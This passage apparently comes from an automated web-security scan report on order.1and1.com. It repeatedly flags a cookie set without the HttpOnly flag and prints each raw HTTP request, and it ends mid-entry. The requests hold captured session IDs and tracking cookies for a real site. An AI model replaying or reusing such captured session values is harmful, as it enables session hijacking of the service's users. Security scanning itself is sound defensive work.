<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=41597db82a3d3000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebspaceExplorer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FirstWebsite;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=721928ff566a0c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FirstWebsite HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5329a8951a3be400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Gtc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3c94c49b88c62400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Home HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=eshopupselling; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:11:AAABLtRYZ*3Z0AoL3q_g3EClOijRS1_a:1300642686957; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=652e051eff6a6c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Hosting HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=28664dbb52ba0400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Instant HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=352ad3850d1b6400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/International HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4b847f0707b00000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Jumpto HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4f8da0fc7a41dc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/LocalSubmission HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.listlocal HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=68e33d48799c0000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
